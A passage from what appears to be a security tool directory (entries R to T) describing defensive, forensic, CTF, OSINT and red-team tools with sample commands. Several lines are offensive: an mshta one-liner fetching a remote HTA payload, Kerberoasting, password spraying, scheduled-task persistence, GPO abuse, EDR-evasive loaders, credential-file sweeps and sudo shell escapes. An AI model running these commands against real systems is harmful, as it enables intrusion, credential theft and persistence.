RIPE NCC's tool for exploring routing history, WHOIS and geolocation data for any IP, prefix or ASN, backed by RIPE's own registry and RIS routing data.

visit → added by THUGS(red)

RiskIQ Community (Microsoft Defender TI Community) tool

DNS OSINT Recon Research

Free tier of Microsoft's threat-intel platform (formerly RiskIQ PassiveTotal) offering passive DNS, WHOIS history and certificate data for infrastructure investigations.

visit → added by THUGS(red)

RITA (Real Intelligence Threat Analytics) tool Linux

Blue Team Malware Network

Active Countermeasures' open-source beaconing-detection tool — analyses Zeek logs for the regular-interval connection patterns that C2 beacons produce, surfacing them without needing signatures for the malware itself.

rita import /opt/zeek/logs/current mydataset
visit → added by THUGS(red)

Rizin tool

Binary / RE CTF

Community fork of radare2's core, focused on a cleaner API and UX while keeping the same disassembly/analysis engine; Cutter is its official GUI front end.

rz-bin -I ./binary
visit → added by THUGS(red)

ROADtools tool

Blue Team Cloud Enumeration

Framework for exploring and auditing Azure AD (Entra ID) — dumps the full directory into a local database, then browses/queries it offline for defensive review or misconfiguration hunting.

roadrecon gather\nroadrecon gui
visit → added by THUGS(red)

rockyou.txt tool

Brute Force Wordlists

The most famous password wordlist in the field — 14 million real passwords leaked from the 2009 RockYou breach, still the default dictionary for a first hashcat/John pass.

visit → added by THUGS(red)

ROP Emporium tool

Binary / RE CTF Research

A structured series of binary exploitation challenges purpose-built to teach ROP techniques, with the same challenge repeated across x86, x86-64, ARM and MIPS builds.

visit → added by THUGS(red)

ROPgadget tool

Binary / RE CTF Payloads

Scans a binary for usable ROP/JOP gadgets and can auto-build a full ROP chain — the standard first step once a pwn challenge needs code reuse instead of shellcode.

ROPgadget --binary ./chall --ropchain
visit → added by THUGS(red)

ROPium tool Linux

Binary / RE CTF Offensive

Automatic ROP chain generator that reasons about gadget semantics rather than just pattern-matching mnemonics, so it can combine several gadgets to satisfy a constraint no single gadget meets.

visit → added by THUGS(red)

ropper tool

Binary / RE CTF Payloads

Gadget finder and ROP-chain builder similar to ROPgadget, with its own semantic gadget search (e.g. "pop rdi; ret") across ELF/PE/Mach-O.

ropper --file ./chall --search "pop rdi"
visit → added by THUGS(red)

RsaCtfTool tool

Cryptography CTF

Automates a long list of known RSA attacks (Wiener, Fermat, common factor, small e, Coppersmith and more) against a given public key, and decrypts the ciphertext if one lands.

python3 RsaCtfTool.py --publickey key.pub --uncipherfile flag.enc
visit → added by THUGS(red)

rsatool tool

Cryptography CTF

Derives a complete RSA private key from any sufficient subset of known parameters (p, q, n, e, d, phi) — handy when a CTF challenge leaks partial key material instead of the full key.

rsatool.py -p <p> -q <q> -e 65537 -o key.pem
visit → added by THUGS(red)

RSMangler tool

Brute Force Wordlists

Word-mangling tool (leetspeak substitutions, case flips, appended years/symbols) that expands a small seed wordlist into a much larger set of realistic password variants.

rsmangler --file words.txt > mangled.txt
visit → added by THUGS(red)

rtl_433 tool Linux

Hardware Research SDR / RF

Decodes and prints the traffic of hundreds of ISM-band devices (weather stations, tyre-pressure sensors, wireless doorbells, key fobs) from an RTL-SDR-class dongle.

rtl_433 -f 433.92M
visit → added by THUGS(red)

rtl-sdr (librtlsdr) tool Linux

Hardware SDR / RF

The driver and command-line utilities (rtl_sdr, rtl_fm, rtl_tcp) that turned cheap DVB-T USB dongles into general-purpose SDR receivers — the hardware most of this category is built on.

rtl_sdr -f 433920000 -s 250000 capture.bin
visit → added by THUGS(red)

Rubeus tool Windows

Offensive Red Team

A C# toolset for raw Kerberos interaction and abuse — Kerberoasting, AS-REP roasting, ticket forging and pass-the-ticket, the standard reference implementation for Windows AD Kerberos attacks.

Rubeus.exe kerberoast /outfile:hashes.txt
visit → added by THUGS(red)

Ruler tool

Brute Force Red Team

Abuses Exchange client access protocols (MAPI/HTTP, Autodiscover) for brute-forcing and, historically, for gaining remote code execution via malicious Outlook rules/forms.

ruler --domain corp.com brute --users users.txt --passwords pass.txt
visit → added by THUGS(red)

Run a remote HTA with mshta one-liner Windows

LOLBAS / LOTL Payloads Red Team

mshta.exe executes HTML Application files straight off a URL, one of the most common LOLBAS initial-execution paths.

mshta.exe http://10.10.14.7/payload.hta
visit → added by THUGS(red)

Run a script with cscript one-liner Windows

LOLBAS / LOTL Payloads

cscript.exe and wscript.exe execute .js/.vbs files directly, still the delivery mechanism behind a lot of commodity phishing payloads.

cscript.exe //nologo payload.vbs
visit → added by THUGS(red)

RustScan tool

Network Recon Red Team

An extremely fast port scanner written in Rust that pipes its results straight into nmap for service detection — the "scan the internet in seconds" front end to nmap's slower, thorough back end.

rustscan -a 10.10.10.10 -- -sC -sV
visit → added by THUGS(red)

S3Scanner tool

Cloud Enumeration Recon

Scans for open/misconfigured Amazon S3 buckets given a list of bucket-name candidates, reporting existence and public read/write access.

s3scanner scan --bucket-file bucket-names.txt
visit → added by THUGS(red)

Sagan tool Linux

Blue Team Defensive Network

A real-time log analysis and correlation engine designed to sit alongside Snort/Suricata, applying Snort-like rule syntax to log data so log events and network alerts can be correlated in one place.

sagan -c /usr/local/etc/sagan.yaml
added by THUGS(red)

SageMath tool

Cryptography CTF Research

Full computer algebra system with deep number-theory and elliptic-curve support — the usual scripting environment for hand-rolled RSA/ECC/lattice attacks that go beyond canned tools.

sage -c "print(factor(n))"
visit → added by THUGS(red)

SBECmd tool Windows

Blue Team Forensics

Eric Zimmerman's shellbags parser — reconstructs folders a user browsed, even ones since deleted, from the registry's shellbag structures.

SBECmd.exe -d C:\Users\<u>\NTUSER.DAT --csv out
visit → added by THUGS(red)

Scalpel tool Linux

Blue Team Forensics

Fast, configurable file carver — reads a header/footer definition file to extract specific file types from an unallocated disk image or memory dump.

scalpel -c scalpel.conf -o carved/ image.dd
visit → added by THUGS(red)

ScareCrow tool Windows

Payloads Red Team

Payload creation framework that wraps shellcode in a signed, EDR-evasive loader using techniques such as syscall unhooking and process herpaderping.

ScareCrow -I beacon.bin -Loader binary -domain -O beacon.exe
visit → added by THUGS(red)

schtasks — persistence via a scheduled task one-liner Windows

LOLBAS / LOTL Red Team

The built-in Task Scheduler CLI, used to re-run something on logon or on a timer — no third-party persistence tooling required.

schtasks /create /sc onlogon /tn "Updater" /tr "C:\Windows\Temp\run.exe" /rl highest
visit → added by THUGS(red)

ScoutSuite tool

Blue Team Cloud Whitebox

Multi-cloud security auditing tool that pulls configuration data from AWS/Azure/GCP/Alibaba via each provider's API and reports misconfigurations in a readable HTML report.

scout aws
visit → added by THUGS(red)

Scylla tool Windows

Binary / RE

Import table reconstruction and process-dumping tool, used to rebuild a valid PE from a manually-unpacked process image whose imports were resolved at runtime.

visit → added by THUGS(red)

ScyllaHide tool Windows

Binary / RE

Anti-anti-debug plugin for x64dbg, OllyDbg and IDA that hides the debugger from common Windows detection checks (PEB flags, timing checks, NtQueryInformationProcess).

visit → added by THUGS(red)

SDR# (SDRSharp) tool Windows

Hardware SDR / RF

One of the original general-purpose SDR receiver front ends — waterfall, demodulators and a plugin ecosystem, still widely used with RTL-SDR/Airspy/HackRF hardware.

visit → added by THUGS(red)

SDRangel tool

Hardware SDR / RF

Full-featured SDR receiver and transmitter application with dozens of built-in demodulators (including digital voice), a REST API, and multi-device/multi-channel support.

visit → added by THUGS(red)

Search auditd logs for a watched key one-liner Linux

Blue Team Forensics

When auditd is configured, ausearch turns its raw log into a readable timeline of exactly which process touched a watched file or syscall.

ausearch -k <watch-key> -ts recent
added by THUGS(red)

Search bash history across all users one-liner Linux

Blue Team Forensics

Root can read every user history file in one pass, useful in an incident-response sweep for a command that reveals lateral movement.

sudo find /home /root -name '.*_history' -exec sh -c 'echo == {} ==; cat {}' \;
added by THUGS(red)

Search for interesting file extensions one-liner Windows

Enumeration Red Team

A fast sweep for password manager databases, saved RDP sessions and private keys, which are usually worth more than any exploit.

Get-ChildItem C:\Users -Include *.kdbx,*.rdp,*.ppk,*.pem -Recurse -ErrorAction SilentlyContinue
added by THUGS(red)

Search journald for a service failing or restarting repeatedly one-liner Linux

Blue Team Forensics

On systemd hosts this finds a service that keeps crashing/restarting, which is often the visible symptom of a webshell or exploit repeatedly killing the parent process.

journalctl -u <service> --since '1 hour ago' | grep -Ei 'fail|restart|core dump'
added by THUGS(red)

Search recursively for SUID shell scripts one-liner Linux

Enumeration Red Team

Shell scripts ignore the SUID bit on Linux, but finding one still flags a misconfigured wrapper worth investigating for a symlink or race-condition attack.

find / -xdev -perm -4000 -exec file {} \; 2>/dev/null | grep -i script
added by THUGS(red)

Search shell history for secrets one-liner Linux

Enumeration Forensics

Bash and zsh history commonly retain a plaintext password typed into a curl or mysql invocation months earlier.

grep -riE 'pass|secret|token|key' ~/.*history 2>/dev/null
added by THUGS(red)

Search the filesystem for credential material one-liner Windows

Enumeration Red Team

Config files, scripts and old backups routinely have a plaintext password embedded; this sweeps common extensions in one pass.

Get-ChildItem C:\ -Include *.config,*.xml,*.txt,*.ini -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern 'password' -List
added by THUGS(red)

Search the filesystem with Spotlight metadata one-liner macOS

Enumeration Forensics

mdfind queries the Spotlight index directly, often far faster than a raw find across an entire disk.

mdfind -name "id_rsa"
added by THUGS(red)

SearXNG tool

OSINT Search Engines

Self-hostable, privacy-respecting metasearch engine that aggregates results from many search backends without tracking the querier — useful for dorking without one engine seeing every query.

visit → added by THUGS(red)

Seatbelt tool Windows

Enumeration Offensive Red Team

GhostPack C# host-survey tool — dozens of checks (AV, patches, tokens, AppLocker, WSUS, etc) run in one pass to build a picture of a landed Windows host.

Seatbelt.exe -group=all
visit → added by THUGS(red)

seccomp-tools tool Linux

Binary / RE CTF

Dumps and disassembles a running process's seccomp-BPF syscall filter, which pwn challenges use to restrict which syscalls a shellcode-based exploit is allowed to make.

seccomp-tools dump ./chall
visit → added by THUGS(red)

SecLists tool

Brute Force Fuzzing Wordlists

The single most-used wordlist collection in the field — usernames, passwords, URLs, fuzzing payloads and more, curated and maintained, and bundled by default in Kali.

visit → added by THUGS(red)

SecRepo.com tool

Blue Team Forensics Research

Curated collection of publicly available security-relevant datasets (network captures, logs, malware metadata) for research and detection-engineering practice.

visit → added by THUGS(red)

Security Onion tool Linux

Blue Team Defensive Network

A free Linux distribution for network security monitoring and log management — bundles Zeek, Suricata, Wazuh and a full Elastic-based analyst UI into one deployable platform for a whole SOC stack.

visit → added by THUGS(red)

SecurityTrails tool

DNS OSINT Recon Research

Historical and current DNS/WHOIS intelligence platform — passive DNS history, IP neighbor lists and subdomain data, popular for infrastructure attribution.

visit → added by THUGS(red)

Semantic Scholar tool

Research Search Engines

AI-assisted academic search engine with citation graphs and influence scoring, an alternative lens on the same literature Google Scholar indexes.

visit → added by THUGS(red)

Shadowserver Foundation tool

Defensive Recon Research

Nonprofit that scans the internet at scale and sends free daily exposure/compromise reports to the network owners who register for them.

visit → added by THUGS(red)

Shadowsocks tool

Network VPN / Anonymity

Lightweight encrypted SOCKS5 proxy protocol originally designed to blend in with normal traffic and evade deep packet inspection/censorship, rather than to anonymise like Tor.

ss-local -s server_ip -p 8388 -k password -m aes-256-gcm -l 1080
visit → added by THUGS(red)

SharpGPOAbuse tool Windows

Offensive Red Team

Abuses GPO edit rights a low-privileged account was granted, pushing a malicious immediate scheduled task/user right to any computer the GPO applies to.

SharpGPOAbuse.exe --AddComputerTask --TaskName evil --Author corp\user --Command cmd.exe --GPOName "Default Domain Policy"
visit → added by THUGS(red)

SharpHound tool Windows

Enumeration Offensive Red Team

The C# data-collector for BloodHound — run on or against a domain-joined host to gather the sessions, ACLs and group data BloodHound turns into an attack-path graph.

.\SharpHound.exe -c All
visit → added by THUGS(red)

SharpShooter tool Windows

Payloads Red Team

MDSec payload generation framework producing JS, VBS, HTA and macro payloads with staged/stageless delivery, sandbox-evasion and DotNetToJScript-style execution.

python SharpShooter.py --stageless -o out --dotnetver 4 --com --output raw
visit → added by THUGS(red)

SharpUp tool Windows

Offensive Red Team

C# port of PowerUp — automated checks for common Windows local privilege-escalation vectors (unquoted service paths, weak service ACLs, AlwaysInstallElevated, etc).

SharpUp.exe audit
visit → added by THUGS(red)

shellnoob tool Linux

Binary / RE CTF

Shellcode development toolkit for converting between asm/opcode/C-string/objdump representations and testing shellcode in an isolated environment.

visit → added by THUGS(red)

Sherlock tool

OSINT Recon

Hunts for a given username across hundreds of social media and web platforms at once, reporting back exactly where an account with that handle exists.

sherlock username
visit → added by THUGS(red)

Sherlock alternative: Blackbird tool

OSINT Recon

Username/email OSINT tool searching hundreds of sites in parallel with browser-based verification, aiming for fewer false positives than a plain HTTP-status username checker.

blackbird -u target_username
visit → added by THUGS(red)

Shodan tool

Device Search OSINT Recon Search Engines

The original internet-wide device search engine — indexes banners from scanning the whole IPv4 space, so you can search for exposed services, devices and misconfigurations by product, port or CVE.

shodan search "apache" country:DK
visit → added by THUGS(red)

Shodan Dorking cheat sheet (Shodan filter guide) tool

Cheat Sheets Device Search OSINT Recon

Shodan's own reference for its search filter syntax (product, port, org, ssl.cert, etc.) — essential for turning a vague "find exposed X" into a precise query.

visit → added by THUGS(red)

Show Prefetch execution evidence without a parser installed one-liner Windows

Blue Team Forensics

Lists every Prefetch file with its last-modified time when a proper parser like PECmd is not available on the box you are triaging — a rough but immediate proxy for program execution history.

Get-ChildItem C:\Windows\Prefetch\*.pf | Sort-Object LastWriteTime -Descending | Select-Object Name, LastWriteTime
added by THUGS(red)

Shuffle tool

Blue Team Defensive

Open-source SOAR — drag-and-drop playbooks that pull alerts, enrich IOCs and drive response actions across a SOC toolchain without paying for a commercial SOAR seat.

visit → added by THUGS(red)

shuffledns tool

Brute Force DNS Recon

ProjectDiscovery wrapper around massdns for subdomain brute-forcing and resolution, built to plug into the rest of their recon toolchain.

shuffledns -d example.com -w wordlist.txt -r resolvers.txt
visit → added by THUGS(red)

Sigma tool

Blue Team Defensive

A generic, SIEM-agnostic signature format for describing log-based detections — write a detection once in Sigma YAML and convert it (via pySigma/sigma-cli) to Splunk, Elastic, QRadar or a dozen other query languages.

sigma convert -t splunk rule.yml
visit → added by THUGS(red)

signature-base tool

Blue Team Defensive Malware

Neo23x0's public collection of YARA rules and IOCs used by Loki/THOR — a solid, actively maintained rule set to drop straight into your own scanner or SIEM.

visit → added by THUGS(red)

sigrok / PulseView tool

Hardware

Open-source logic analyzer/oscilloscope software stack (sigrok drivers plus the PulseView GUI) supporting dozens of cheap USB logic analyzers, with protocol decoders for UART/SPI/I2C and more.

sigrok-cli --driver fx2lafw --config samplerate=24m --samples 1000
visit → added by THUGS(red)

SILENTTRINITY tool Windows

Offensive Payloads Red Team

Post-exploitation C2 using IronPython/.NET (BoO — "Bring your Own Interpreter") to dodge signature-based detection of PowerShell and classic .NET loaders.

visit → added by THUGS(red)

SiLK tool Linux

Blue Team Network

CERT/CC's System for Internet-Level Knowledge — a netflow collection and analysis toolkit built for querying flow records at very large (ISP/enterprise-backbone) scale.

rwfilter --start-date=2026/09/03 --proto=6 --pass=stdout | rwstats --fields=dip --top --count=10
visit → added by THUGS(red)

Skiptracer tool

OSINT Recon

OSINT scraping framework that aggregates public-record and people-search sites (courts, social media, phone directories) against a target name.

skiptracer -m full -q "Jane Doe"
visit → added by THUGS(red)

Sliver tool

Offensive Red Team

An open-source, cross-platform adversary-emulation (C2) framework from BishopFox — implants, dynamic code generation and a scriptable operator console for authorised red-team exercises.

visit → added by THUGS(red)

Sn0Int tool

OSINT Recon

Semi-automated OSINT framework and local recon database for correlating people, phone numbers, domains and subdomains across a long-running investigation.

sn0int
visit → added by THUGS(red)

Snaffler tool Windows

Enumeration Offensive Red Team

Crawls every SMB share a compromised user can reach and greps for credentials, config secrets and other juicy files, ranking hits by how interesting they look.

Snaffler.exe -d corp.local -o snaffler.log
visit → added by THUGS(red)

Snort tool Linux

Blue Team Defensive Network

One of the original open-source network intrusion detection/prevention systems — a huge community rule-set ecosystem built up over more than two decades.

snort -A console -q -c /etc/snort/snort.conf -i eth0
visit → added by THUGS(red)

SNOW tool

CTF Steganography

Whitespace steganography tool — hides a message in the trailing spaces and tabs at the end of text lines, invisible unless you go looking for it (or view the file with tabs shown).

snow -C -m "secret" cover.txt stego.txt
visit → added by THUGS(red)

Snusbase tool

OSINT Research

Subscription database-breach search engine used in credential and account-exposure investigations, searchable by email, username, IP or password hash.

visit → added by THUGS(red)

Snyk Vulnerability Database tool

Research

Searchable database of known vulnerabilities in open-source library dependencies across major language ecosystems, with remediation/fixed-version guidance.

visit → added by THUGS(red)

Social Analyzer tool

OSINT Recon

API/CLI/web tool that analyzes and finds a person's profiles across 1000+ social platforms, using detection modules beyond simple username-exists checks.

python3 app.py --username johndoe --metadata --output web
visit → added by THUGS(red)

Social Catfish tool

OSINT

Reverse search service built for verifying an online identity — cross-references a photo, email, phone or username to flag likely catfishing/romance-scam profiles.

visit → added by THUGS(red)

Sonic Visualiser tool

CTF Steganography

Audio analysis application with a detailed spectrogram view, the standard way to visually reveal a message or image hidden in an audio file's frequency content.

visit → added by THUGS(red)

Sourcegraph tool

Research Search Engines

Code search and navigation engine across many repositories at once, self-hostable or hosted — useful for tracing where a leaked secret or vulnerable pattern is actually used.

visit → added by THUGS(red)

Speakeasy tool

Binary / RE Blue Team Malware

Mandiant's Windows binary emulator for malware analysis — runs a sample's code against an emulated Windows API surface to observe its behaviour (registry, network, file activity) without a full sandbox VM or real execution.

speakeasy -t malware.exe -o report.json
visit → added by THUGS(red)

Spectrology tool

CTF Steganography

Encodes a hidden image or message into an audio file such that it only becomes visible as a spectrogram — the tool behind the "load the WAV in Sonic Visualiser" CTF trope.

python spectrology.py -i secret.png -o out.wav
visit → added by THUGS(red)

SpiderFoot tool

OSINT Recon

An OSINT automation engine — point it at a domain, IP, email or name and it fans out across 200+ data-source modules to map the external attack surface and threat exposure.

spiderfoot -s target.tld -u all
visit → added by THUGS(red)

SpiderFoot (offensive recon mode) tool

OSINT Recon Red Team

An automation engine for OSINT, but used heavily on the offensive side too: point it at a domain and it fans out across dozens of data sources to map the whole external attack surface.

spiderfoot -s target.tld -u all
visit → added by THUGS(red)

sploitus tool

Research

Search engine that aggregates exploits and security tools from multiple public sources (Exploit-DB, GitHub, Metasploit modules) into one searchable index.

visit → added by THUGS(red)

Spokeo tool

OSINT

US people-search aggregator pulling address history, relatives, phone numbers and social profiles from public records into one profile.

visit → added by THUGS(red)

Spot beaconing candidates in a Zeek conn.log one-liner Linux

Blue Team Malware Network

Ranks host pairs by connection count as a quick, RITA-free first pass at spotting regular-interval C2 beaconing in Zeek connection logs.

zcat conn.log.gz | zeek-cut id.orig_h id.resp_h duration | sort | uniq -c | sort -rn | head
added by THUGS(red)

Spray365 tool

Brute Force Cloud

Password-spraying tool targeting Microsoft 365 across multiple undocumented authentication endpoints, built to keep working as Microsoft changes its login flow.

spray365 spray --credential-list creds.txt
visit → added by THUGS(red)

SprayingToolkit tool Linux

Brute Force Red Team

Wraps password spraying against Lync/Skype for Business and OWA with sane delays and lockout-avoidance logic baked in.

./atomizer.py owa 10.10.10.5 users.txt Summer2026!
visit → added by THUGS(red)

sqlmap tool

CTF Red Team Web

Automates detecting and exploiting SQL injection vulnerabilities, including database fingerprinting, data extraction and, where the DBMS allows it, OS command execution.

sqlmap -u 'http://target/?id=1' --batch --dbs
visit → added by THUGS(red)

ss — check what is actually listening, without netstat one-liner Linux

CTF Enumeration Network

netstat is deprecated on most modern distros; ss is the built-in replacement for a quick "what is this box listening on" check.

ss -tulnp
added by THUGS(red)

ssdeep tool

Hashing Malware

Fuzzy (context-triggered piecewise) hashing tool for measuring similarity between files rather than exact equality — used to cluster near-identical malware samples or CTF file variants.

ssdeep -r samples/
visit → added by THUGS(red)

SSLBL tool

Blue Team Malware Network

abuse.ch's SSL Blacklist — JA3/JA3s and certificate SHA1 fingerprints associated with malware C2, useful for detecting malicious TLS traffic without decrypting it.

visit → added by THUGS(red)

Start a process with wmic one-liner Windows

Enumeration LOLBAS / LOTL Red Team

wmic process call create starts a process with no visible console window, and works against a remote host with /node.

wmic process call create "cmd.exe /c whoami > C:\Windows\Temp\out.txt"
visit → added by THUGS(red)

Startpage tool

OSINT Search Engines

Privacy-focused search engine that proxies Google's index without forwarding the searcher's identity to Google, useful for dorking without linking queries to an account.

visit → added by THUGS(red)

Steampipe tool

Blue Team Cloud Defensive

Turbot's tool that exposes cloud provider APIs as SQL tables — write plain SQL to audit AWS/Azure/GCP/Kubernetes/GitHub configuration instead of writing bespoke API scripts.

steampipe query "select name, arn from aws_s3_bucket where not block_public_acls;"
visit → added by THUGS(red)

StegCracker tool

Brute Force CTF Steganography

Dictionary brute-forcer for steghide-protected files, wrapping steghide itself in a loop over a wordlist — Stegseek is the faster modern replacement for the same job.

stegcracker image.jpg rockyou.txt
visit → added by THUGS(red)

StegExpose tool

CTF Steganography

Steganalysis tool that scores a set of PNG/BMP images for likely LSB steganography, useful for triaging which of many images in a CTF archive is worth digging into by hand.

java -jar StegExpose.jar images/
visit → added by THUGS(red)

steghide tool

CTF Steganography

A steganography tool that hides data inside JPEG, BMP, WAV and AU files, with optional passphrase-based encryption — the classic CTF stego first-try.

steghide extract -sf image.jpg
visit → added by THUGS(red)

stegoVeritas tool

CTF Steganography

Steganography toolkit that automates the usual checklist against an image — metadata, LSB extraction, bit-plane dumps, colour-channel splits, and running other steg tools for you.

stegoveritas.py image.png
visit → added by THUGS(red)

Stegseek tool

Brute Force CTF Steganography

Extremely fast steghide passphrase cracker (thousands of times faster than brute-forcing steghide itself) that tries an entire wordlist against a JPEG/BMP/WAV/AU carrier.

stegseek carrier.jpg rockyou.txt
visit → added by THUGS(red)

StegSolve tool

CTF Steganography

Java GUI for stepping through bit planes, colour channels, palettes and frames of an image — the classic manual-inspection tool for image steganography before scripting anything.

java -jar stegsolve.jar
visit → added by THUGS(red)

Stenographer tool Linux

Blue Team Forensics Network

Google's high-throughput full-packet-capture daemon — buffers traffic to disk on a rolling basis so that when an IDS fires, the packets behind the alert can still be pulled minutes or hours later.

visit → added by THUGS(red)

strace a setuid binary to see what it touches one-liner Linux

Binary / RE CTF Red Team

Traces every syscall a binary makes — the fastest way to spot a privesc-relevant file it reads/writes, or a library it loads from a writable path.

strace -f -e trace=open,openat,execve ./suspicious-binary 2>&1 | less
added by THUGS(red)

Stratus Red Team tool

Blue Team Cloud Red Team

Datadog's "Atomic Red Team for the cloud" — a library of self-contained, granular attack techniques against AWS/Azure/GCP (disable CloudTrail, create an access key, assume a role) for testing whether cloud detections actually catch them.

stratus detonate aws.persistence.iam-backdoor-role
visit → added by THUGS(red)

strings tool

Binary / RE CTF Forensics

Extracts printable character sequences from a binary file — the first, fastest thing to run against any unknown file, from GNU binutils.

strings -n 8 suspicious.bin | less
visit → added by THUGS(red)

subfinder tool

DNS Enumeration OSINT Recon

ProjectDiscovery's fast passive subdomain enumeration tool, pulling from dozens of public sources and APIs; built to pipe cleanly into the rest of their toolchain.

subfinder -d example.com -all -o subs.txt
visit → added by THUGS(red)

sudo -l — enumerate what you can already run as root one-liner Linux

CTF Enumeration Red Team

The very first command in any Linux privesc checklist: lists every command the current user is allowed to sudo, which is the input GTFOBins entries actually key off.

sudo -l
visit → added by THUGS(red)

SunCalc tool

OSINT Research

Sun position/shadow-length calculator for any place and date, used in manual image geolocation to narrow down time-of-day and time-of-year from shadows in a photo.

visit → added by THUGS(red)

Suricata tool Linux

Blue Team Defensive Network

A high-performance open-source network IDS/IPS and network security monitoring engine — multi-threaded, Snort-rule-compatible, with built-in protocol logging.

suricata -i eth0 -c /etc/suricata/suricata.yaml
visit → added by THUGS(red)

Syft tool

Blue Team Cloud Defensive

Anchore's SBOM (Software Bill of Materials) generator for container images and filesystems — the package inventory that Grype and other scanners match CVEs against.

syft myapp:latest -o cyclonedx-json
visit → added by THUGS(red)

Sysinternals Suite tool Windows

Binary / RE

Microsoft's classic Windows diagnostics suite (Process Monitor, Process Explorer, Autoruns) — used in RE to watch a challenge binary's file/registry/process activity live instead of guessing from static analysis.

visit → added by THUGS(red)

sysmon-config (SwiftOnSecurity) tool Windows

Blue Team Defensive

The widely-adopted, well-commented baseline Sysmon configuration — a sane starting ruleset for logging high-value security events without drowning a SIEM in noise.

sysmon.exe -c sysmonconfig-export.xml
visit → added by THUGS(red)

Sysmon-modular tool Windows

Blue Team Defensive

Olaf Hartong's modular Sysmon configuration — swap in only the event categories you need (process creation, network, WMI, DNS…) rather than one giant monolithic config file.

visit → added by THUGS(red)

System Informer tool Windows

Blue Team Defensive Forensics

Community-maintained continuation of Process Hacker — deep process, service, network and driver inspection for live Windows triage, including terminating handles that a normal task manager cannot touch.

visit → added by THUGS(red)

systemctl — abuse a pager to spawn a shell one-liner Linux

CTF LOLBAS / LOTL Red Team

systemctl status pipes its output through less by default; from inside that pager, !/bin/sh spawns a shell — a real GTFOBins entry that surprises a lot of people.

sudo systemctl status trivial-rce-cve
# once the pager opens, type: !/bin/sh
visit → added by THUGS(red)

syzkaller tool Linux

Binary / RE Fuzzing

Coverage-guided kernel fuzzer built by Google, used to find Linux/Windows/macOS kernel bugs that CTF kernel-pwn challenges are frequently modelled on.

visit → added by THUGS(red)

T-Pot tool Linux

Blue Team Defensive Network

Deutsche Telekom's all-in-one honeypot platform — bundles Cowrie, Dionaea and a couple dozen other honeypots plus an ELK dashboard into one Docker-composed deployment, for a broad-spectrum sensor rather than a single service.

visit → added by THUGS(red)

Tailscale tool

Network VPN / Anonymity

Zero-config mesh VPN built on WireGuard — commonly used in security work to build a private, NAT-traversing network between lab/attack boxes without hand-managing keys or port forwards.

tailscale up --ssh
visit → added by THUGS(red)

Talkwalker Alerts tool

OSINT Research

Free web-mention monitoring service similar to Google Alerts, useful as a second source since the two crawl and rank differently.

visit → added by THUGS(red)

tar — spawn a shell via a checkpoint action one-liner Linux

CTF LOLBAS / LOTL Red Team

GNU tar's --checkpoint-action flag can be abused to run an arbitrary command mid-archive — one of the less obvious GTFOBins entries.

tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
visit → added by THUGS(red)

tcpdump tool

Forensics Network

The original command-line packet capture/analysis tool, built on libpcap — no GUI, everywhere by default, and still the fastest way to grab a capture on a box with nothing else installed.

tcpdump -i eth0 -w capture.pcap
visit → added by THUGS(red)

tcpflow tool Linux

Blue Team Forensics Network

Captures data transmitted as part of TCP connections and reconstructs each stream into its own file — useful for pulling application-layer content back out of a live capture.

tcpflow -i eth0 -o flows/
visit → added by THUGS(red)

tcpreplay tool Linux

Blue Team Defensive Network

Replays previously captured pcap traffic back onto a live network at controlled speed — used to test IDS/IPS/SIEM detection rules against known-bad traffic without re-attacking anything.

tcpreplay -i eth0 --mbps=10 malicious.pcap
visit → added by THUGS(red)

TCPView tool Windows

Blue Team Forensics Network

Sysinternals GUI showing every active TCP/UDP endpoint with the owning process — a quick live-response check for unexpected outbound connections.

visit → added by THUGS(red)

Terrascan tool

Blue Team Cloud Defensive

Static IaC security scanner covering Terraform, Kubernetes, Helm and CloudFormation — policy-as-code rules (OPA-based) catch misconfigurations before they reach production.

terrascan scan -i terraform -d ./infra
visit → added by THUGS(red)

TestDisk tool

Blue Team Forensics

Free partition recovery and repair tool — rebuilds lost partition tables and boot sectors, a first step before deeper forensic imaging of a damaged disk.

testdisk image.dd
visit → added by THUGS(red)

testssl.sh tool Linux

Cryptography Network Web

Checks a server's TLS/SSL configuration from the command line — supported protocols and ciphers, certificate details, and known vulnerabilities like Heartbleed or POODLE — no browser or Qualys quota needed.

./testssl.sh https://target.tld
visit → added by THUGS(red)

Tetragon tool Linux

Blue Team Cloud Defensive

Cilium's eBPF-based security observability and runtime enforcement tool — real-time visibility into process execution, file and network activity with the option to block, not just alert.

visit → added by THUGS(red)

That'sThem tool

OSINT

Free reverse phone, address and email lookup service pulling matches from US public records.

visit → added by THUGS(red)

theHarvester tool

OSINT Recon

Gathers emails, subdomains, hosts and employee names for a target domain from a wide range of public sources — usually the first command run in the OSINT phase of an engagement.

theHarvester -d target.tld -b all
visit → added by THUGS(red)

theHarvester alternative: Recon-ng tool

OSINT Recon

Full-featured web reconnaissance framework with a modular, Metasploit-style console — API-backed modules for domains, hosts, contacts and credentials pulled into one workspace.

recon-ng -w workspace
visit → added by THUGS(red)

TheHive tool

Blue Team Defensive

Scalable, open-source Security Incident Response Platform — cases, tasks, observables and templated playbooks for a SOC/CSIRT team working alerts together.

visit → added by THUGS(red)

theZoo tool

Blue Team Malware Research

Curated repository of live malware samples for research and defence testing — clearly labelled and deliberately hard to run by accident.

visit → added by THUGS(red)

THOR Lite tool

Blue Team Defensive Malware

Nextron Systems' free edition of their commercial THOR APT scanner — a faster, more actively maintained successor to Loki, built to sweep a host for the same class of compromise indicators and YARA hits.

visit → added by THUGS(red)

ThreatFox tool

Blue Team Malware Research

abuse.ch platform for sharing indicators of compromise (IOCs) — malicious IPs, domains and URLs tied to specific malware families, free to query via API.

visit → added by THUGS(red)

Timeline of SSH auth events one-liner Linux

Blue Team Forensics

Merges failed and successful SSH authentication lines into one chronological view, the fastest way to spot a brute-force run that ends in a successful login.

grep -E 'Failed password|Accepted password' /var/log/auth.log
added by THUGS(red)

Timesketch tool

Blue Team Forensics

Google's collaborative timeline-analysis platform — ingests Plaso timelines (and other sources) into a searchable, shareable web UI so a team can annotate and correlate events instead of grepping one giant CSV alone.

visit → added by THUGS(red)

TinEye tool

OSINT Search Engines

One of the oldest reverse image search engines, strong at tracing where an image first appeared online and how it has been reused since.

visit → added by THUGS(red)

TitanHide tool Windows

Binary / RE

Kernel-mode driver that hides a debugger's presence from a target process at a lower level than user-mode hooking alone can reach.

visit → added by THUGS(red)

TLSH tool

Hashing Malware

Trend Micro's locality-sensitive fuzzy hash, an alternative to ssdeep with better resistance to certain evasion tricks, used for file/malware similarity matching.

visit → added by THUGS(red)

Top talkers in a web access log one-liner Linux

Blue Team Forensics Network

